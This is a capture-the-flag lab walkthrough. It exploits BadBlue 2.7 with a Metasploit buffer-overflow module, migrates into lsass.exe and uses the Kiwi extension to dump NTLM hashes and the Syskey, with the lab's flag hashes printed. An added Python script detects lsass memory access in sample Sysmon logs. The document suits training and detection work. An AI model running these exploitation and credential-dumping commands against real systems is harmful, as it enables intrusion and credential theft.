Windows-Meterpreter-Kiwi Extension

This document outlines the steps to exploit a vulnerable application (BadBlue 2.7) using Metasploit and the Kiwi extension for post-exploitation tasks. It includes commands for scanning the target, exploiting the vulnerability, and extracting NTLM hashes and Syskey. The document serves as a reference for various commands necessary for completing the lab exercise.

Uploaded by Harlian

Name Windows: Meterpreter: Kiwi Extension

URL https://attackdefense.com/challengedetails?cid=2340

Type Post Exploitation: With Metasploit

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Check the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap 10.0.27.166


Step 3: We have discovered that multiple ports are open. We will run Nmap again to determine
the service version on port 80.

Command: nmap -sV -p 80 10.0.27.166

Step 4: Search for an exploit module for BadBlue 2.7 using searchsploit.

Command: searchsploit badblue 2.7


Step 5: There is a Metasploit module for the BadBlue server. We will use the BadBlue PassThru
remote buffer overflow Metasploit module to exploit the target.

Commands:
msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.27.166
exploit

We have successfully exploited the vulnerable target application (BadBlue) and received a
Meterpreter shell.

Step 6: Migrate the Meterpreter session into the lsass.exe process.

Command: migrate -N lsass.exe


Step 7: Load the Kiwi extension.

Command: load kiwi

Step 8: Dump the Administrator user's NTLM hash using the Kiwi extension commands.

Command: creds_all
This revealed the flag to us:

Administrator User NTLM Hash: e3c61a68f1b89ee6c8ba9507378dc88d

Step 9: Extract all users' NTLM hashes using Kiwi.

Command: lsa_dump_sam
This revealed another flag to us:

Student User NTLM Hash: bd4ca1fbe028f3c5066467a7f6a73b0b

Step 10: Find the Syskey by dumping the LSA secrets.

Command: lsa_dump_secrets
This revealed another flag to us:

Syskey: 377af0de68bdc918d22c57a263d38326
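Steps 6 to 10 work because the session ends up inside lsass.exe with rights to read its memory, which is the same requirement every credential-dumping tool has. From the defender's side, that handle acquisition is the observable event: Sysmon Event ID 10 (ProcessAccess) records the source image, the target image and the GrantedAccess mask, and PROCESS_VM_READ (0x0010) must be present for memory to be read at all. The following Python script is an added example written for this page, not part of the lab or of Metasploit; it runs a simple detection over constructed, simplified Sysmon-style log lines. The log format, the file paths and the allow-list of benign lsass readers (KNOWN_LSASS_READERS) are assumptions for illustration and would need tuning per environment.

```python
import re

# Constructed, simplified Sysmon-style records (key=value on one line).
# Real Sysmon events are XML/EVTX; these are illustrative only.
SAMPLE_LOGS = [
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1400",
    r"EventID=10 SourceImage=C:\Temp\unknown.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventID=10 SourceImage=C:\Program Files\BadBlue\badblue.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1fffff",
    r"EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe",
    r"EventID=10 SourceImage=C:\Windows\System32\taskmgr.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1fffff",
]

# Windows access-right bit required to read another process's memory.
PROCESS_VM_READ = 0x0010

# Assumed allow-list of images that legitimately open lsass.exe on a typical
# host. This is an illustrative placeholder, not a vetted baseline.
KNOWN_LSASS_READERS = {
    "csrss.exe", "wininit.exe", "services.exe", "svchost.exe", "msmpeng.exe",
}

# Splits "Key=Value Key=Value ..." where values may contain spaces
# (e.g. "C:\Program Files\..."); a new field starts only at " Word=".
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_record(line: str) -> dict:
    """Turn one key=value log line into a dict of fields."""
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\x\\y.exe' -> 'y.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious_lsass_access(rec: dict) -> bool:
    """True for a ProcessAccess event where a non-allow-listed image
    obtains a handle to lsass.exe that includes PROCESS_VM_READ."""
    if rec.get("EventID") != "10":
        return False
    if basename(rec.get("TargetImage", "")) != "lsass.exe":
        return False
    granted = int(rec.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return False  # handle cannot read memory, so no dump via this handle
    return basename(rec.get("SourceImage", "")) not in KNOWN_LSASS_READERS


def find_lsass_memory_readers(lines) -> list:
    """Return the parsed records that should raise an alert."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if is_suspicious_lsass_access(rec):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_lsass_memory_readers(SAMPLE_LOGS):
        print("ALERT lsass memory read:", hit["SourceImage"], hit["GrantedAccess"])
```

On the constructed input the script flags the two unknown images (unknown.exe and badblue.exe) and ignores the system processes whose handles lack PROCESS_VM_READ, as well as the unrelated event types. Checking the access bit rather than matching specific masks such as 0x1010 keeps the rule robust to tools that request different but still memory-reading rights.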

References

1. BadBlue 2.72b - Multiple Vulnerabilities (https://www.exploit-db.com/exploits/4715)


2. Metasploit Module
(https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)
